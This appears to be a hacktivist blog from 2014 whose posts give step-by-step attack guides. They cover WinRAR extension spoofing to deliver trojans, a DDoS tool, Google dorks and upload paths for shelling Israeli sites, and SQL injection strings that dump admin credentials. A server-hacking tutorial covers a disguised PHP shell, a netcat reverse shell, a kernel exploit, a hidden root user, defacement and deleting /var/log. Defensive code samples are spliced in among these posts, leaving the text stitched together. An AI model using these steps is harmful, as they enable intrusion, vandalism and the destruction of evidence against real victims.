Showing posts with label Hacking.

22 July 2014

Winrar File Extension Spoofing 0day


In March 2014, a WinRAR file extension spoofing 0day was widely used to hack many Windows users.
In this tutorial, I will explain this vulnerability with some POC images and a video created by my friend Gujjar-Haxor (Pak Cyber Pirates).

Vulnerability Description:

The file names shown in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the local file header. This inconsistency allows an attacker to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code.

NOTE:

This tutorial was found working under a Windows 7 environment. For some reason, it didn't work for my friends using Windows 8, so try it on Win 7 if it doesn't work for you on Win 8. Thanks.

POC:

1- Get a portable executable file. In this tutorial, I am using the Havij software, which is an SQL injection tool, but you can use some trojan or RAT to infect the victim.

2- Right-click on this exe file and click on "Add to archive". Choose the ZIP archive format to compress this file into a ZIP archive.

3- Run Hex Workshop or any other hex editor and open this compressed ZIP archive in it. Go to the end of the file in the hex editor, find havij.exe and rename its extension to jpg, like this: havij.jpg.


4- Now open this zip archive. You will see a havij.jpg icon in the archive. When you double-click it, it will run the havij.exe file.
(This is just a demonstration; you can use your own Metasploit payload, trojan or RAT instead of this havij.exe file.)
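A defender's check for the inconsistency described above, added here as an example (it is not part of the original post and not WinRAR code): it parses the ZIP central directory and each local file header independently and reports every entry whose two names disagree, which is exactly the condition a spoofed archive creates. The sample archive is constructed inside the code; its central directory name is patched to a same-length name with a different extension so that the listed name and the extracted name differ, as in the post.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # local file header signature
CENTRAL_SIG = b"PK\x01\x02"  # central directory entry signature
EOCD_SIG = b"PK\x05\x06"     # end of central directory record


def _central_entries(data):
    """Yield (name, local_header_offset) for each central directory entry.

    These are the names an archiver lists; a spoofed archive shows one
    name here and a different one in the local header it extracts from.
    """
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD layout: sig(4) disk(2) cd_disk(2) entries_here(2) entries(2) cd_size(4) cd_offset(4)
    count, _cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    pos = cd_offset
    for _ in range(count):
        if data[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("bad central directory entry at offset %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        (local_off,) = struct.unpack_from("<I", data, pos + 42)
        yield data[pos + 46:pos + 46 + name_len], local_off
        pos += 46 + name_len + extra_len + comment_len


def _local_name(data, offset):
    """Return the file name stored in the local file header at `offset`."""
    if data[offset:offset + 4] != LOCAL_SIG:
        raise ValueError("no local file header at offset %d" % offset)
    (name_len,) = struct.unpack_from("<H", data, offset + 26)
    return data[offset + 30:offset + 30 + name_len]


def find_name_mismatches(data):
    """Return [(listed_name, extracted_name)] for entries whose names disagree."""
    findings = []
    for listed, local_off in _central_entries(data):
        extracted = _local_name(data, local_off)
        if listed != extracted:
            findings.append((listed.decode("utf-8", "replace"),
                             extracted.decode("utf-8", "replace")))
    return findings


def build_sample(spoofed):
    """Constructed test archive (no real program inside). With spoofed=True the
    central directory name is patched to a same-length name with a different
    extension, reproducing the mismatch the post describes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("sample.exe", b"constructed placeholder bytes, not an executable")
    data = bytearray(buf.getvalue())
    if spoofed:
        eocd = data.rfind(EOCD_SIG)
        (cd_offset,) = struct.unpack_from("<I", data, eocd + 16)
        name_pos = cd_offset + 46                  # name follows the 46-byte fixed header
        data[name_pos:name_pos + 10] = b"sample.jpg"
    return bytes(data)


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else build_sample(spoofed=True)
    for listed, extracted in find_name_mismatches(blob):
        print("MISMATCH: listed as %r but extracts as %r" % (listed, extracted))
```

Run it with a path to an archive to scan it, or with no argument to see the constructed spoofed sample flagged. A mail gateway or download scanner can apply the same comparison before an archive ever reaches an archiver that trusts the two headers differently.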

16 July 2014

Easiest Method To DDoS on Any Site

Distributed denial of service (DDoS)

Distributed denial of service attacks on root nameservers are Internet events in which distributed denial-of-service attacks target one or more of the thirteen Domain Name System root nameserver clusters. The root nameservers are critical infrastructure components of the Internet, mapping domain names to Internet Protocol (IP) addresses and other resource record (RR) data.

STEPS OF DDoS

#1- Download the files from here:

http://leetkhan.ga/ddos.zip(password-ultimatehackers)

#2- Unpack all files in a directory

#3- Choose a target

#4a- For example, I had chosen a site named http://site.com (for testing)

#4b- Open cmd (command prompt)

#4c- Type ping site.com

#4d- Note down the IP address of the site

#5- Open the directory in which you unpacked the zip archive mentioned above

#6a- Install freeportscanner.exe. When the installation is complete, open it and type the IP address we noted previously, as shown in the image

#6b- Hit enter and after some time you will see the open ports on that site

####Hint- You can skip the scanning step (5 to 6a) and choose 80/tcp on any site, because it must be open and HTTP requests normally rely on port 80/tcp

#7- Open Rdos.exe

#7b- Hit enter and see the magic

#####Comment below if you face any problem######




14 July 2014

#opSaveGaza / #opIsrael -- Ultimate Hackers

You Can Burn Our Mosques, Our Homes,
* Our Schools And Whatever You Want
But!
* Our Spirit Will Never Die!
* We Will Never Go Down!
* Stop Killing Innocents



#opSaveGaza / #opIsrael

 

[Some Israel websites hacked]


http://bodyguard.co.il/save_gaza.html
http://text2join.co.il/save_gaza.html
http://derech-eretz.co.il/save_gaza.html
http://warranty.roltime.co.il/save_gaza.html
http://frogs.co.il/save_gaza.html
http://psychoblog.co.il/save_gaza.html
http://www.3access.com/index.html


[Gov + UseFul Sites Down]

 

http://gov.il

http://mossad.gov.il

http://health.gov.il

http://bankmassad.co.il

http://act.co.il

http://president.gov.il

http://kranoth.org.il

http://mfa.gov.il 

http://investinisrael.gov.il

http://agri.gov.il

http://wiezmann.ac.il


and many more!


./Ultimate hackers


Greetz to : 1337kh4n , 4n0nkh4n ,r007 ,d4rk1337 ,Cyb3rd0n ,baby<3 And all other Ultimate Hackers Members!



13 July 2014

Testing Your Sql injection Skills (Create Your Own Penetration Testing Lab)

Hello Guys

It's me, 4n0nkh4n

This tutorial is about testing your knowledge of SQL injection.

If you don't know about SQL injection, read these topics first:
1. Step by Step SQL Injection
2. String Based SQL Injection

 

So, coming to the topic now :p

If you have knowledge of SQL injection and you want to test it, or you want to practice SQL injection attacks,

*Just go Here

and there are many levels to solve :)

If you did it, then here is one more thing to do.

 

Create Your Own Penetration Testing Lab with DVWA :-

 

What is DVWA ?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Download DVWA Now

Download XAMPP Now

You need the XAMPP software for this lab to run DVWA on a local server.

After downloading, install XAMPP as administrator. Now start the Apache, MySQL and FileZilla services. Sometimes, if any other application is using the ports, it will give you an error; in my case port 443 was used by VMware Workstation, so just disable that service with Task Manager.

Now extract the DVWA file that you downloaded from the above-mentioned link and paste it into the C:\xampp\htdocs folder.

Now navigate to https://127.0.0.1/dvwa and click on the Setup option to start the setup.

After setup, enter the credentials username = admin and password = password to log in.

Now click on the Setup option and click on the Create Database option to create your database.

Now your penetration lab is ready for your security application testing.

Enjoy your Penetration Testing Lab with DVWA.

Hope you like my post: Create Your Own Penetration Testing Lab with DVWA. Don't be selfish, please share it with others. :p


#4n0nkh4n

./Ultimate_hackers

 

 

 

 



Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz.. Today I found some FRESH Private Israel 0Day Exploits, so I thought of sharing them with you all.... So let's start....
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
# Exploit Upload 2 -|- 
/admin/AdminPics.aspx
When you upload your ASP or PHP shell, just check the page source and you will see your URL


2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
# Exploit -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

These you just target with Havij or manually, and the admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

09 July 2014

String Based SQL injection

What is String Based SQL injection and how do you notice it?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results that should be displayed after executing our SQLi query.
Commonly known signs that prove the site is vulnerable to String Based are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site will show a normal page even though it is vulnerable to SQLi)



Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is to use the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright, now that you've got the point, let's try String Based on some of the other types of SQL injection, shall we?


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show an error, so we'll assume 10 columns, since this is just an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3. Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
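For contrast with the probing described in this post, here is an added example (not from the original post) that puts the vulnerable query beside its parameterised fix. It uses Python's built-in sqlite3 with a constructed in-memory table instead of the MySQL backend the post targets, and the two probe strings are constructed in the post's format. The error-versus-normal-page difference the tutorial relies on appears only in the concatenating version; the parameterised version treats the whole input as an id value and simply matches nothing.

```python
import sqlite3

# Constructed probes in the format the post uses; only the quote and the
# trailing comment matter, the number just has to exceed the column count.
PROBE_ERROR = "10' order by 1000--+"
PROBE_OK = "10' order by 1--+"


def make_db():
    """Constructed in-memory stand-in for the site's table (sqlite3, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("10", "widget"), ("11", "gadget")])
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the quote in the input closes the literal and the
    rest of the input is parsed as SQL, which is what the post relies on."""
    sql = "SELECT id, name FROM items WHERE id='" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised query: the driver binds the input as a value, so a quote
    or 'order by' inside it is compared against the id column, never executed."""
    return conn.execute("SELECT id, name FROM items WHERE id=?", (user_id,)).fetchall()


def probe(lookup, conn, payload):
    """Run one lookup and classify the outcome the way the post's oracle does:
    ('rows', result) for a normal page, ('error', message) for an SQL error."""
    try:
        return ("rows", lookup(conn, payload))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        for payload in (PROBE_OK, PROBE_ERROR):
            print(name, repr(payload), "->", probe(fn, db, payload))
```

The vulnerable lookup answers `order by 1` with the normal row and `order by 1000` with an out-of-range error, which is the signal the tutorial reads; the safe lookup returns an empty result for both, giving nothing to enumerate. The fix is the same on MySQL: bind the value with the driver's placeholder instead of building the string.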

Top 10 Free VPN Services!!!

First of all, let's talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically, it's a private network which lets users connect to other users or remote sites using a public network, usually the Internet. It uses “virtual” connections routed through the Internet from the company's private network to the remote site or employee instead of physical connections. In short, it is a private network constructed within a public network infrastructure, such as the global Internet.
Why You Need a VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet surfing: full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites.
Unlike a proxy, you get a secured connection for all programs you are using.
A quality network ensures your VPN service will be fast wherever you are in the world.
Protection against your ISP.
Bypass ISP blocking for VoIP applications like Skype.

Top 10 Free VPN Services
1. UltraVPN
(https://www.ultravpn.fr/) It is a free client/server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection, making your connection safe and secure. You need to download and install the client and create a (username, password) to use this service.
2. LogMeIn Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It's a great free VPN service from the well-known guys who are behind the LogMeIn remote app management service. It's free for non-commercial and personal use. Features:
No hardware required – a quick, simple and easy-to-use VPN that just works.
Secure communications – encrypted tunneling across public and private networks.
Flexible networking – combines the ease of an SSL VPN with the connectivity of an IPsec VPN.
Web-based management – deploy to anyone, manage from anywhere, access anytime.
Free for non-commercial usage – absolutely free for non-commercial use.
3. PacketiX
(http://www.packetix.net/en/)
It's a Japanese free VPN solution with technology developed by SoftEther Corporation. You can use the PacketiX.NET online test service for free. Here's what you can do with this service: you can create your own private virtual VPN hub, and you can configure and use the hub for free. You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With their system, you won't need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. OpenVPN
( http://openvpn.net/index.php/opensource/downloads.html )
OpenVPN drives UltraVPN. OpenVPN is an SSL/TLS based VPN; it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is that you need to install OpenVPN client software to use an OpenVPN service, and OpenVPN does NOT work on mobile devices such as iPhone, iPad, Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service, but it performs almost the same function with great ease, hence I included it in this list. It provides both a free and a paid service. The free service is limited to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and a user name & password to use this.
6. MacroVPN
(http://www.macrovpn.com/)
Just like the other services, MacroVPN offers a free VPN service for users; it provides a 128-bit PPTP encrypted VPN connection service and protection on wifi hotspots. Normally assigns US-based IPs.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session, securing your connection at both your home Internet network & public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Here also, you need to download and install a client to use it on your computer.
8. ItsHidden
(http://itshidden.com/)
ItsHidden is part of the Port 80 Limited (Seychelles) company, providing both free and paid VPN services. It creates a secure connection, encrypting all the data, protecting your privacy and securing you. You don't need to install any software. ItsHidden.com works on all platforms including Windows, Mac, Linux, iPhone etc.
9. CyberGhost
(http://cyberghostvpn.com/)
This is a free VPN service from Germany which routes you through a German IP. The free service is limited to 10GB of traffic every month, which is more than enough for surfing websites, chatting and email.
10. GPass
( http://gpass1.com/gpass/)
This is another free VPN service, a product of World's Gate, Inc., which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.

08 July 2014

Your iPhone can be hacked because of iOS vulnerability

Recently Apple Inc. released software patches and updates for the current versions of iOS for the iPhone 4 and newer, the iPad 2 and later, and the fifth-generation iPod touch. A major flaw in Apple devices could allow hackers to intercept email and other communications that are meant to be encrypted, the company says.
"Without the fix, a hacker could impersonate a protected site and sit in the middle as email or financial data goes between the user and the real site," Matthew Green said.
"Apple pushed a rather spooky security update for iOS that suggested that something was horribly wrong with SSL/TLS in iOS but gave no details," said Adam Langley, Google engineer.
After analyzing the patch, several security researchers said the same flaw existed in current versions of Mac OS X, running on Apple laptop and desktop computers. No patch has been released for Mac OS X so far.
'We are aware of this issue and already have a software fix that will be released very soon,' Trudy Muller, Apple spokesman, said.
The issue is a "fundamental bug in Apple's SSL implementation," said Dmitri Alperovitch, chief technology officer at security firm CrowdStrike Inc. Adam Langley, a senior engineer at Google, agreed with CrowdStrike that OS X was at risk.
Apple did not reply to requests for comment. The flaw appears to be in the way that well-understood protocols were implemented, an embarrassing lapse for a company of Apple's stature and technical prowess.
(With inputs from Reuters)

Secure Your PC by using Image as Login Password

In this post I am sharing a new way you can set a password for your laptop or PC if you are using Windows 8. You can secure your computer easily by using an image as the password for your login. Yes, it is possible now.
In Windows 8 you can use an image as your password. Using a text password is the old and boring way, so why not try something different? There are many benefits of using an image as the password; the most important is that it is more secure than any text password. Read the full post, I have mentioned each step that you can follow to change or use any picture as a password. Using image gestures is very easy in Windows 8.




Steps To Create a Picture Password for Windows 8 :


Step 1: The first step is to create a text password. Press Win key + I, then click on Change PC settings. Then you will see an option Create password below Sign-in Options. Just click on Create password and type any password that is safe for you.

Step 2: Now a new option, Create a picture password, will be visible to you, like in the screenshot below. Just tap on it and choose a new picture you want to set as the password.

Step 3: Now the third step is very important. You have to make 3 gestures on the picture you chose as the password for your PC. Making a gesture is very easy, but you have to keep that gesture in your mind, as that gesture will allow you to log in to your PC after setting the picture as password. You can make a line, a circle, a box or anything, but make it easy to remember. You can check the screenshot below; this arrow is my first gesture.

Step 4: Now click on Next and make another gesture. You have to make 3 gestures. After making them, click Save.

It's done. Now you have set a picture as the password for your Windows 8. If you like this article, comment below and support me to bring more such interesting articles for you.

The screenshot below shows the 3 gestures I have used for my password. You can also create any gesture like me.

04 July 2014

How to Hack a Server

Tutorial on Web Hacking by 4n0nkh4n

Web hacking is my favorite topic, one that I could easily discuss for hours.

When I had the idea to expand our blog's topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc....) and add more hacking information, tutorials etc...., I decided to make a good start today by creating this post-tutorial: How to Hack a Server.
Everything you need to know....

Tools you need:

- Backtrack (Backtrack Website)
- Firefox (get it from here....) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack) — If you are on other Linux environments get it from here....
- iCon2PHP (Get it from here....)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below.....)
- Acunetix Web Vulnerability Scanner (google it or contact us)

About the Tools:

Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking from a Linux system is better than from a Windows one, since most websites are on Linux servers.
(Just a little tip: to wirelessly connect to a network use the Wicd Network Manager, located under Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons, among which you can find some for hacking.
Netcat
– Netcat is a powerful networking tool. You will need this to root the server....
iCon2PHP & Good Shells
– iCon2PHP is a tool I created, and you will use it if you upload the image to an image uploader at a forum or image hosting service. The iCon2PHP archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too...)
– While hacking you need to be anonymous so that nobody can find you (even if you forget to delete the logs....). VPN stands for Virtual Private Network, and what it does is hide your IP and encrypt the data you send to and receive from the Internet. A good VPN solution for Windows machines is ProXPN. However, with VPN connections (especially when you are on a free VPN connection) your connection speed is really slow. So, I wouldn't recommend VPN unless you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle, Vidalia, which is a great tool for Windows, Mac and Linux that uses proxies all over its network around the world so as to keep you anonymous, changing these proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don't want to pay for a paid VPN account.
Apart from Tor, simple proxies are good, but I wouldn't recommend them as much as I would Tor.
— If I listed the above options according to their reliability:
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe) the best vulnerability scanner. It scans for open ports, vulnerabilities and directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit them and how to patch them. It also shows if it is a small or big vulnerability.
The Consultant Edition (for unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

- – -  Before we begin  – - -

-Boot to Backtrack
-Connect to your VPN or to Tor.
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix. Open it and scan the website (use the standard profile; don't modify anything unless you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know....)
Let's say we find a vulnerability where we can upload a remote file (our shell) and have access to the website's files.
The warning should be something like this. It can mention other information or be a completely different warning (like for SQL Injection; I will post a tutorial on this also...), too! (It depends on the vulnerability.) What we need for this tutorial is that we can exploit the ‘File Inclusion Attack’ and have access to the website's files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now we have the site and the path where the vulnerability is. In our example let's say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven't updated to the latest version of TimThumb, which is an image-editing service on websites.
OK. Acunetix should also mention the OS of the server. We assume that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because the vulnerability is located in an outdated TimThumb version, and TimThumb is a service to edit images, we need to upload the shell in place of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don't care what it shows.
Generate Output with iCon2PHP
Copy your image and your shell to the folder where iCon2PHP is located.
Run the program and follow the in-program instructions to build ‘finalImage.php’.
To avoid any errors while uploading, rename ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the format your image was – jpeg, jpg, gif....). This is exactly the same file, but it confuses the uploader into thinking that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com” (or another big image-hosting service) because sometimes it doesn't accept images from other websites.
Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
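Section 2 depends on two weaknesses in the receiving side: an uploader that judges a file by a name such as ‘image.php;.png’, and a remote-fetch check that accepts any host whose name merely begins with a trusted image host. The following is an added example (not from the original tutorial, not TimThumb code, and not part of any upload library) showing how an application's upload handler and remote-URL check close both gaps. The allow-list of remote hosts is an assumed value, and the sample file names and header bytes are constructed.

```python
import os
import re
from urllib.parse import urlsplit

# Declared extension -> leading bytes the content must start with.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}

# Hypothetical allow-list of hosts a thumbnailer may fetch from (assumption).
ALLOWED_REMOTE_HOSTS = ("flickr.com", "staticflickr.com")

# One token, one dot, one extension: no ';', no second '.', no separators.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")


def check_upload(filename, head):
    """Return (accepted, reason) for an uploaded file name and its first bytes."""
    normalised = os.path.basename(filename.replace("\\", "/"))
    if normalised != filename or not SAFE_NAME.fullmatch(filename):
        return False, "name must be a single token with exactly one extension"
    ext = os.path.splitext(filename)[1].lower()
    magic = IMAGE_MAGIC.get(ext)
    if magic is None:
        return False, "extension %s is not an allowed image type" % ext
    if not head.startswith(magic):
        return False, "content does not match the declared image type"
    return True, "ok"


def remote_host_allowed(url):
    """Match the parsed host exactly or as a dotted suffix, so a host that
    merely begins with 'flickr.com' is not mistaken for flickr."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in ALLOWED_REMOTE_HOSTS)


if __name__ == "__main__":
    # Constructed inputs mirroring the two tricks the tutorial depends on.
    print(check_upload("image.php;.png", b"\x89PNG\r\n\x1a\n"))
    print(check_upload("photo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"))
    print(remote_host_allowed("http://flickr.com.domain.0fees.net/image.php;.png"))
    print(remote_host_allowed("https://farm1.staticflickr.com/1/2.jpg"))
```

The magic-byte check is necessary but not sufficient: a valid image with PHP appended still starts with the right bytes, which is exactly what the tool in this tutorial produces. The control that actually defeats that file is to store uploads where no script handler runs (outside the web root, or in a directory the server is configured never to execute), and to re-encode images on the server rather than serving the uploaded bytes. Remote fetching by a thumbnailer should be disabled unless it is genuinely needed, and then restricted with host matching like the one above.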

3. Root the Server:

Now that you have shelled your website we can start the process to root the server.
What is rooting when it comes to server hacking?
—> Rooting a server is the procedure by which the hacker acquires root privileges on the whole server. If you don't understand this yet, I reassure you that by the end of the section “Rooting a server” you will have understood exactly what it is...
Let's proceed to rooting....
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host: YourIPAddress Port: 402 (or the port you forwarded....)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the procedure by which the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or pass a message to the people or the company (which owns the website...).
Since you got the website shelled, you just create a nice hacky page in HTML and upload it via the shell as inbox.html (delete or rename the website's own one...)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you, we have to delete the logs.
First of all, Unix-based machines have some logs that you had better either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them at once type:
su root1
rm -rf /var/log
mkdir /var/log

30 June 2014

SSL/TLS BEAST

Researchers have discovered a serious vulnerability in TLS v1.0 and SSL v3.0 that allows attackers to silently decrypt data that's passing between a webserver and an end-user browser. This vulnerability can be exploited using a new cookie-based technique called “BEAST” (“Browser Exploit Against SSL/TLS”) that takes advantage of block-oriented cipher implementations such as AES and TripleDES.

Which file transfer protocols are affected?

Any interactive HTTPS-based web-based transfer application that relies on SSL/TLS will probably be affected.   Web-based “file send” applications will almost certainly be affected.  Web services that use cookies to maintain an authenticated session after sign on will also be affected.
At the moment it appears that only protocols that make use of browser cookies are affected.  That means that the FTPS and AS2 protocols are safe for now, even if they use TLS v1.0 or SSL v3.0.
SFTP and other protocols that use encryption not based on SSL/TLS are of course not affected by BEAST.

Which vendors are affected?

Just about ALL of them.  Any on-premise product or cloud-based product that:
  • allows end users to upload, download or send files through a web browser
  • AND uses an SSL/TLS-secured channel (i.e., uses HTTPS)
  • AND uses cookies (even memory-only cookies) to maintain user sessions after the initial sign on
Recommendation

  • CHOICE #1:
    • DISABLE TLS v1.0 support on your file transfer web interfaces
    • DISABLE SSL v.3.0 support
    • ENABLE TLS v.1.1 and TLS v.1.2 support
  • CHOICE #2:
    • DISABLE AES and TripleDES encryption support on your file transfer web interfaces
      • (as per this article, both AES and TripleDES are affected)
    • ENABLE RC4 encryption support
  • IN ALL CASES:
    • Keep SSL v.2.0 disabled
      • (you should have already done this years ago)
    • If you are using a managed file transfer gateway or proxy to terminate SSL/TLS sessions, remember to check those configurations too
If you apply our “CHOICE #1″ recommended configuration you will likely encounter some compatibility problems with end users whose web browsers do not support TLS v1.1 or v1.2.  To get around this issue you will need to have your users upgrade their browsers to editions that support TLS v1.1 (see partial list below) or have your end users use a different web browser.  (The latest version of Opera and IE both support TLS v1.1.)
